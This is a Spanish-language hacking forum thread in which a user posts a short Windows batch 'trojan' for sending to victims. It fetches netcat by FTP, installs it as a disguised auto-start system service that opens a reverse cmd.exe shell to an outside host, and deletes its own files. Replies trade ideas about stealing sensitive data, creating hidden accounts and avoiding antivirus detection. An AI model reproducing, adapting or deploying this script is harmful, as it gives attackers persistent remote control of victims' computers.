FORUM


Reload | Recent posts | New post


Troyano para windows No detectable! [Batch]


xAutor: xx l0ve
Answers: 11
Date: 2011-09-07
Agradecer Agradecimientos: 3

Jaja les traigo este simple troyano de conexión inversa hecho en pocas lineas, no testeado para Windows que intenta conectarse a una dirección. Bueno es simple, se descarga el nc.exe por ftp, lo mueve a system32 y lo agrega como servicio del sistema, si este se cierra automáticamente se inicia e intenta conectarse, no se si funciona pero tal vez con las modificaciones correcta queda . Yo no uso Windows por ende tengo poca idea. Solo se que la ruta con espacios afecta al agregar el servicio. Hay que hacerle los cambios de la configuración en el code.

Le envian el batch a la victima y ya conocen lo demàs .

@echo off
echo user usuario> ftpcmd.dat
echo password>> ftpcmd.dat
echo bin>> ftpcmd.dat
echo get nc.exe>> ftpcmd.dat
echo quit>> ftpcmd.dat
ftp -n -s:ftpcmd.dat ftp.servidor.com
move nc.exe %SystemRoot%\system32\nc.exe
sc create "Administrador del sistema" binpath= "%SystemRoot%\system32\nc.exe ip.no-ip.org puerto -e cmd.exe" error= "Critical" start= "auto"
del ftpcmd.dat
del mi.bat



Saludos!

Han agradecido este post: incid3nt Jackrar tuvieja .

Answers:



[x][x][x] incid3nt (11 y): 8738 Yo hace tiempo hcie uno similar con xDariohcx pero con más funciones,como extraccion de datos "sensibles",creación de una cuenta de usuario ...etc

Saludos ;)


[x][x][x] l0ve (11 y): 8739 Esta muy bien este es muy bàsico, una shell para controlar el sistema y un servicio anti cierre .. 13 lineas de còdigo. lo ideal!!


[x][x][x] Knet (11 y): 8749 se ve lindo, funcara en win7?


[x][x][x] l0ve (11 y): 8750 no creo, todo depende de la config de seguridad.


[x][x][x] incid3nt (11 y): 8751 Aunque tiene que estar en el sistema el nc.exe,podrias usar el complementarlo con el código que creaba el netcat en batch xD



[x][x][x] l0ve (11 y): 8752 mejor con el codigo que lo creaba, pero ni lees el codigo, este descarga el netcat por ftp y mejor si consiguen un ftp anonimo.


[x][x][x] incid3nt (11 y): 8753 Ah,l0ve disculpame,lo pase por alto.

Si lo habia leido pero no con atencion xD


[x][x][x] chad (11 y): 8754 Voy a usarlp en vb.net porce esp es detectable porque usa netcat , el netcat es detectable


[x][x][x] zer0max (11 y): 8756 bien


[x][x][x] soybenox (4 m): 9609 nice


[x][x][x] MuldeR (4 m): 9610 Benox entra al discord https://discord.gg/hdF3epNfsn


Para dejar un comentario Registrase o Iniciar sesión